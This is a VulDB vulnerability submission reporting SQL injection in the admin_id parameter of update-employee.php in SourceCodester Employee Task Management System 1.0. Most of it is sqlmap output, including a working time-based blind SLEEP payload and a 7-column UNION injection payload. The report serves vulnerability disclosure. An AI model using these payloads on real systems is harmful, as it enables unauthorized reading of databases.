Submit #299168: SourceCodester Employee Task Management System v 1.0 SQL Injection in param admin_id in update-employee.php

Title: SourceCodester Employee Task Management System v 1.0 SQL Injection in param admin_id in update-employee.php

Description: SQL Injection in param admin_id in update-employee.php

[20:40:26] [INFO] GET parameter 'admin_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:40:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:40:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:40:50] [INFO] target URL appears to be UNION injectable with 7 columns
[20:40:51] [INFO] GET parameter 'admin_id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'admin_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: admin_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: admin_id=28' AND (SELECT 9712 FROM (SELECT(SLEEP(5)))LThc) AND 'CUEh'='CUEh

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: admin_id=-3580' UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x4d454655527a5759756977515963705172466b7571445763574e5955704353476273685474526846,0x71706b7171),NULL,NULL,NULL,NULL,NULL-- -
---

Source: https://github.com/tht1997/WhiteBox/blob/main/sourcecodester/update-employee.md
User: huutuanbg97 (UID 45015)
Submission: 03/15/2024 14:44 (2 years ago)
Moderation: 03/16/2024 07:14 (16 hours later)
Status: Duplicate
VulDB entry: 257053 [SourceCodester Employee Task Management System 1.0 update-employee.php admin_id sql injection]
Points: 0
